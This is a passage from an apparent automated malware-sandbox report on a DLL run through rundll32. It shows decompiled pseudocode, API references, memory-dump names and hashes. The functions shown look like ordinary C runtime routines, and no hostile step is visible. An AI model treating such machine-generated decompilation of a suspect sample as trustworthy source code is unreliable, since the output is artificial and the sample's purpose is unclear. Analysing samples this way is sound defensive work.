											_t37 = 0;
											 *0x6f37e7b4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f37e7b8 = _t58;
											L18:
											E6F33FEFF(_t37);
											_v12 = 0;
											L19:
											E6F33FEFF(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f37e7b4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f37e7b8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F3401A4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F3401A4(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F3400E7();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6f33f52b
0x6f33f534
0x6f33f539
0x6f33f543
0x6f33f546
0x6f33f563
0x6f33f563
0x6f33f564
0x6f33f577
0x6f33f57c
0x6f33f584
0x6f33f58a
0x6f33f58d
0x6f33f58f
0x6f33f596
0x6f33f596
0x6f33f598
0x6f33f59b
0x6f33f59e
0x6f33f5a5
0x6f33f5be
0x6f33f5c3
0x6f33f5c5
0x6f33f5e6
0x6f33f5ee
0x6f33f5f1
0x6f33f60c
0x6f33f60f
0x6f33f616
0x6f33f61a
0x6f33f61c
0x6f33f623
0x6f33f626
0x6f33f628
0x6f33f62a
0x6f33f62c
0x6f33f636
0x6f33f636
0x6f33f638
0x6f33f63e
0x6f33f641
0x6f33f643
0x6f33f649
0x6f33f64a
0x6f33f650
0x6f33f653
0x6f33f654
0x6f33f65a
0x6f33f65d
0x00000000
0x00000000
0x00000000
0x00000000
0x6f33f62e
0x6f33f62e
0x6f33f62e
0x6f33f631
0x6f33f632
0x6f33f632
0x00000000
0x6f33f62e
0x6f33f61e
0x00000000
0x6f33f61e
0x6f33f5f6
0x6f33f5f6
0x6f33f5f7
0x6f33f5fc
0x6f33f5fe
0x6f33f600
0x6f33f605
0x6f33f605
0x00000000
0x6f33f605
0x6f33f5c7
0x6f33f5cc
0x6f33f5ce
0x6f33f5cf
0x00000000
0x6f33f5cf
0x6f33f591
0x6f33f594
0x00000000
0x00000000
0x00000000
0x6f33f594
0x6f33f548
0x6f33f54b
0x00000000
0x00000000
0x6f33f54d
0x6f33f554
0x6f33f555
0x6f33f557
0x6f33f55c
0x00000000
0x6f33f55c
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F33F56E, 6F33F575, 6F33F5AB
p4, xrefs: 6F33F57C

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe$p4
API String ID: 0-1443154838
Opcode ID: 28f84983b3dde12f2b7f5e60f7e91a3e1b56c2103a1bd078c7fc5a4afd363a1c
Instruction ID: c2e06340905153cd34ede8a5c841b5407c3ed651d949bfe27fb5d721f543495a
Opcode Fuzzy Hash: 28f84983b3dde12f2b7f5e60f7e91a3e1b56c2103a1bd078c7fc5a4afd363a1c
Instruction Fuzzy Hash: A64182B2E047B4AFEB19DFA9C880D9EBBFCEF95314F50016AE404A7290D7719A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6F344C89, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F344C89(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E6F343D99(_t33) != 0xffffffff) {
					_t13 =  *0x6f37e428; // 0xea0940
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E6F343D99(2);
						if(E6F343D99(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E6F343D99(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E6F343D08(_t33);
						 *((char*)( *((intOrPtr*)(0x6f37e428 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E6F34016E(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x6f344c90
0x6f344c9d
0x6f344ca3
0x6f344cab
0x6f344cb9
0x00000000
0x00000000
0x00000000
0x00000000
0x6f344cc1
0x6f344cc1
0x6f344cc3
0x6f344cd5
0x00000000
0x00000000
0x6f344cd7
0x6f344ce7
0x00000000
0x00000000
0x6f344cef
0x6f344cf1
0x6f344cf2
0x6f344d0a
0x6f344d11
0x00000000
0x6f344d1f
0x00000000
0x6f344d1a
0x6f344cab
0x6f344c9f
0x6f344c9f
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,6F344BBF,?,6F3652B8,0000000C,6F344C67,?,?,?), ref: 6F344CDF
GetLastError.KERNEL32(?,6F344BBF,?,6F3652B8,0000000C,6F344C67,?,?,?), ref: 6F344CE9
__dosmaperr.LIBCMT ref: 6F344D14

Strings

@, xrefs: 6F344CA3

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: @
API String ID: 2583163307-2548697605
Opcode ID: 9df68092adfb5ef1abbf73ea209ddc2c86b5494259938d41ef06dc9d5e8cfcbe
Instruction ID: 2d312e34633e36e950afa48de933ffa1f3f72d09875a3091a88a06ad8977d341
Opcode Fuzzy Hash: 9df68092adfb5ef1abbf73ea209ddc2c86b5494259938d41ef06dc9d5e8cfcbe
Instruction Fuzzy Hash: 720126366187203AD2149A74D9497AD37DDAF87B38F29022EED588F1C1DF72EC8056B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3415AB, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3415AB(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F3427A9(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F3427A9(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F34016E(GetLastError());
									_t19 =  *((intOrPtr*)(E6F3401A4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F341BF1(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F34016E(GetLastError());
						return  *((intOrPtr*)(E6F3401A4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F341BF1(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F341BD7(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6f3415b2
0x6f3415b7
0x6f3415d5
0x6f3415d7
0x6f3415da
0x6f341607
0x6f34160f
0x6f341611
0x6f34162a
0x6f34162d
0x6f341630
0x6f34163e
0x6f34164d
0x6f341655
0x6f341657
0x6f341670
0x6f341673
0x6f341673
0x6f341659
0x6f341660
0x6f34166b
0x6f34166b
0x6f341675
0x00000000
0x6f341675
0x6f341635
0x6f34163a
0x6f34163c
0x00000000
0x00000000
0x00000000
0x6f34163c
0x6f34161a
0x00000000
0x6f341625
0x6f3415dc
0x6f3415df
0x6f3415e2
0x6f3415f5
0x6f3415f8
0x6f3415cb
0x6f3415cb
0x00000000
0x6f3415ce
0x6f3415e8
0x6f3415ed
0x6f3415ef
0x6f341679
0x6f341679
0x00000000
0x6f3415ef
0x6f3415b9
0x6f3415be
0x6f3415c3
0x6f3415c5
0x6f3415c8
0x00000000

APIs

Part of subcall function 6F341BD7: _free.LIBCMT ref: 6F341BE5

Part of subcall function 6F3427A9: WideCharToMultiByte.KERNEL32(?,00000000,6F34084A,00000000,00000001,6F3407E3,6F343ABD,?,6F34084A,?,00000000,?,6F343834,0000FDE9,00000000,?), ref: 6F34284B

GetLastError.KERNEL32 ref: 6F341613
__dosmaperr.LIBCMT ref: 6F34161A
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F341659
__dosmaperr.LIBCMT ref: 6F341660

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 014d9c863778687c512f5d21edde0b7339aa1be6007a6f200b83bb03d9ac79b4
Instruction ID: e6c35f6e901844dacffdfb3f4312457e6b0fb15671610f4cf57dac7106ac7660
Opcode Fuzzy Hash: 014d9c863778687c512f5d21edde0b7339aa1be6007a6f200b83bb03d9ac79b4
Instruction Fuzzy Hash: 7521D371604B05BFE712BF658D8095BB7EDEF013787048618FC6597290EB36EC208BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F34103A, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6F34103A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f36619c; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3404CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F3401B7(_t43, 1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t51);
							if(__eflags != 0) {
								E6F340E38(_t60, _t51, 0x6f37e640);
								E6F33FEFF(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F3404CA(__eflags,  *0x6f36619c, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F3404CA(0,  *0x6f36619c, 0);
							_push(0);
							L9:
							E6F33FEFF();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F34048B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f36619c; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F33FE28(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f36619c; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F3404CA(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F3401B7(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t60);
								if(__eflags != 0) {
									E6F340E38(_t60, _t60, 0x6f37e640);
									E6F33FEFF(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F3404CA(__eflags,  *0x6f36619c, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F3404CA(__eflags,  *0x6f36619c, _t20);
								_push(_t60);
								L25:
								E6F33FEFF();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F34048B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6f36619c; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F33FE28(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f36619c; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F3404CA(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6F3401B7(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t54);
											if(__eflags != 0) {
												E6F340E38(_t61, _t54, 0x6f37e640);
												E6F33FEFF(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F3404CA(__eflags,  *0x6f36619c, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F3404CA(0,  *0x6f36619c, 0);
											_push(0);
											L41:
											E6F33FEFF();
											goto L36;
										}
									}
								} else {
									_t54 = E6F34048B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f36619c; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6f34103a
0x6f34103a
0x6f341045
0x6f341047
0x6f34104c
0x6f34104f
0x6f34106d
0x6f341070
0x6f341075
0x6f341077
0x00000000
0x6f341079
0x6f341085
0x6f341088
0x6f341089
0x6f34108b
0x6f3410b0
0x6f3410b2
0x6f3410cb
0x6f3410d2
0x6f3410d7
0x00000000
0x6f3410b4
0x6f3410b4
0x6f3410bd
0x6f3410c2
0x00000000
0x6f3410c2
0x6f34108d
0x6f34108d
0x6f34108d
0x6f341096
0x6f34109b
0x6f34109c
0x6f34109c
0x6f3410a1
0x00000000
0x6f3410a1
0x6f34108b
0x6f341051
0x6f341057
0x6f34105b
0x6f341068
0x00000000
0x6f34105d
0x6f341060
0x6f3410da
0x6f3410da
0x6f341062
0x6f341062
0x6f341062
0x6f341064
0x6f341064
0x6f341064
0x6f341060
0x6f34105b
0x6f3410dd
0x6f3410e5
0x6f3410e7
0x6f3410e9
0x6f3410f1
0x6f3410f6
0x6f3410f7
0x6f3410fc
0x6f3410fd
0x6f341100
0x6f34111a
0x6f34111d
0x6f341122
0x6f341124
0x00000000
0x6f341126
0x6f341132
0x6f341135
0x6f341136
0x6f341138
0x6f34115b
0x6f34115d
0x6f341174
0x6f34117b
0x6f341180
0x00000000
0x6f34115f
0x6f341166
0x6f34116b
0x00000000
0x6f34116b
0x6f34113a
0x6f341141
0x6f341146
0x6f341147
0x6f341147
0x6f34114c
0x00000000
0x6f34114c
0x6f341138
0x6f341102
0x6f341108
0x6f34110a
0x6f34110c
0x6f341115
0x00000000
0x6f34110e
0x6f34110e
0x6f341111
0x6f34118b
0x6f34118b
0x6f341190
0x6f341193
0x6f341194
0x6f341195
0x6f34119c
0x6f34119e
0x6f3411a3
0x6f3411a6
0x6f3411c4
0x6f3411c7
0x6f3411cc
0x6f3411ce
0x00000000
0x6f3411d0
0x6f3411dc
0x6f3411e0
0x6f3411e2
0x6f341207
0x6f341209
0x6f341222
0x6f341229
0x00000000
0x6f34120b
0x6f34120b
0x6f341214
0x6f341219
0x00000000
0x6f341219
0x6f3411e4
0x6f3411e4
0x6f3411e4
0x6f3411ed
0x6f3411f2
0x6f3411f3
0x6f3411f3
0x00000000
0x6f3411f8
0x6f3411e2
0x6f3411a8
0x6f3411ae
0x6f3411b0
0x6f3411b2
0x6f3411bf
0x00000000
0x6f3411b4
0x6f3411b4
0x6f3411b7
0x6f341231
0x6f341231
0x6f3411b9
0x6f3411b9
0x6f3411b9
0x6f3411b9
0x6f3411bb
0x6f3411bb
0x6f3411bb
0x6f3411b7
0x6f3411b2
0x6f341234
0x6f34123c
0x6f34123e
0x6f34123e
0x6f341245
0x6f341113
0x6f341183
0x6f341183
0x6f341185
0x00000000
0x6f341187
0x6f34118a
0x6f34118a
0x6f341185
0x6f341111
0x6f34110c
0x6f3410eb
0x6f3410f0
0x6f3410f0

APIs

GetLastError.KERNEL32(?,?,?,6F343575,00000000,00000001,6F34084A,?,6F343A32,00000001,?,?,?,6F3407E3,?,00000000), ref: 6F34103F
_free.LIBCMT ref: 6F34109C
_free.LIBCMT ref: 6F3410D2
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F343A32,00000001,?,?,?,6F3407E3,?,00000000,00000000,6F365098,0000002C,6F34084A), ref: 6F3410DD

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: cd62c94f6af5236501c3db2c4dfd9b17017c76c20f656653e12a0cf461b3dca1
Instruction ID: dc9bea37333c43837c3db220c4495c6ec39d33d69cdbac7572e829787a6fb5f3
Opcode Fuzzy Hash: cd62c94f6af5236501c3db2c4dfd9b17017c76c20f656653e12a0cf461b3dca1
Instruction Fuzzy Hash: 7811E977318F806ADB1237798C80D6B21ED9BE33BD7210329F2688A2D1DF2798358560

Uniqueness

Uniqueness Score: -1.00%

Function 6F341191, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6F341191(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0x6f36619c; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3404CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6F3401B7(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t18);
							if(__eflags != 0) {
								E6F340E38(_t21, _t18, 0x6f37e640);
								E6F33FEFF(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F3404CA(__eflags,  *0x6f36619c, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F3404CA(0,  *0x6f36619c, 0);
							_push(0);
							L9:
							E6F33FEFF();
							goto L4;
						}
					}
				} else {
					_t18 = E6F34048B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f36619c; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6f341191
0x6f34119c
0x6f34119e
0x6f3411a3
0x6f3411a6
0x6f3411c4
0x6f3411c7
0x6f3411cc
0x6f3411ce
0x00000000
0x6f3411d0
0x6f3411dc
0x6f3411e0
0x6f3411e2
0x6f341207
0x6f341209
0x6f341222
0x6f341229
0x00000000
0x6f34120b
0x6f34120b
0x6f341214
0x6f341219
0x00000000
0x6f341219
0x6f3411e4
0x6f3411e4
0x6f3411e4
0x6f3411ed
0x6f3411f2
0x6f3411f3
0x6f3411f3
0x00000000
0x6f3411f8
0x6f3411e2
0x6f3411a8
0x6f3411ae
0x6f3411b2
0x6f3411bf
0x00000000
0x6f3411b4
0x6f3411b7
0x6f341231
0x6f341231
0x6f3411b9
0x6f3411b9
0x6f3411b9
0x6f3411bb
0x6f3411bb
0x6f3411bb
0x6f3411b7
0x6f3411b2
0x6f341234
0x6f34123c
0x6f341245

APIs

GetLastError.KERNEL32(-00000017,6F37E844,00000000,6F3401A9,6F33FEF4,6F37E824,?,6F33C421,00000000,6F37E844,00000000), ref: 6F341196
_free.LIBCMT ref: 6F3411F3
_free.LIBCMT ref: 6F341229
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F33C421,00000000,6F37E844,00000000), ref: 6F341234

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 70732edc4beea3fe66f1b30c8cffd06e9b95332bdc57d0131ce7cd2850b1f453
Instruction ID: a17c7fae8275d0727cc78a489d50913bb53839b2ab34d2c0d18cab425eec0b9e
Opcode Fuzzy Hash: 70732edc4beea3fe66f1b30c8cffd06e9b95332bdc57d0131ce7cd2850b1f453
Instruction Fuzzy Hash: 5B11DB76309F002AD70277789C80E5B26EE9BE37BD7211328F669DA6C1DF22DC314960

Uniqueness

Uniqueness Score: -1.00%

Function 6F345292, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F345292(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f3668f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F34527B();
					E6F34523D();
					_t13 = WriteConsoleW( *0x6f3668f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f3452af
0x6f3452b3
0x6f3452c0
0x6f3452c5
0x6f3452e0
0x6f3452e0
0x6f3452e6

APIs

WriteConsoleW.KERNEL32(?,?,6F34084A,00000000,?,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001), ref: 6F3452A9
GetLastError.KERNEL32(?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000,00000001,?,6F343A56,6F3407E3), ref: 6F3452B5

Part of subcall function 6F34527B: CloseHandle.KERNEL32(FFFFFFFE,6F3452C5,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000,00000001), ref: 6F34528B

___initconout.LIBCMT ref: 6F3452C5

Part of subcall function 6F34523D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F34526C,6F344E04,00000001,?,6F343502,00000000,00000000,00000001,00000000), ref: 6F345250

WriteConsoleW.KERNEL32(?,?,6F34084A,00000000,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000), ref: 6F3452DA

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1863e3691fe079da9055e0278611491f4394da96e3d9d81381f91b3ca3e672d0
Instruction ID: 5de67caad7177a75c3da58593677ec1828ec2ec4d96a96bb65797f428c8264d1
Opcode Fuzzy Hash: 1863e3691fe079da9055e0278611491f4394da96e3d9d81381f91b3ca3e672d0
Instruction Fuzzy Hash: 63F03036444615BBCF523FA5CC08A8D3FAEFF0A3F0B144419FA1989160DB3288309BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F342221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6F342221(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				char _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E6F34233C(__ebx, __ecx, __edx, __eflags);
				_t39 = E6F341FC6(__eflags, _a4);
				_v16 = _t39;
				_t69 =  *(_a12 + 0x48);
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t81 = E6F33FEB1(_t69, 0x220);
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000;
					_t86 = E6F34242D(_t64, _t79, _t81,  *(_a12 + 0x48), __eflags, _v16, _t81);
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E6F341371();
						}
